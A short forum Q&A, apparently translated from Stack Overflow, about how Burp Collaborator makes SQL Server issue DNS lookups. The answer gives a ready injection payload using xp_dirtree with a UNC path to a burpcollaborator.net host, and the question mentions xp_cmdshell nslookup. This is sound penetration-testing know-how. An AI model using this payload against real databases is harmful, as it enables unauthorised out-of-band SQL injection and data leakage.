2017-05-05 56 views
0

Burp協作者如何通過t-sql和Sql Server發送DNS查詢?Burp協作者如何通過Sql Server和T-sql發送DNS查詢

https://portswigger.net/burp/help/collaborator.html

我知道你可以在SQL Server 2005或2008的存儲過程使用例如exec master..xp_cmdshell 'nslookup intel.com'Dns.GetHostAddresses()這裏提到:https://stackoverflow.com/a/967696/3850405

但是不是很多服務器允許xp_cmdshell今天,這是理所當然的,但這意味着Burp協作者使用別的東西。什麼?連接只需要出站,不需要返回。

回答

0

找到了答案exec master.dbo.xp_dirtree。示例:

;exec master.dbo.xp_dirtree 
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'-- 

http://releases.portswigger.net/2015/09/1627.html

如果您已經安裝打嗝套件專業版,您可以通過打嗝產生的鏈接 - >打嗝合作者客戶端,然後輪詢結果。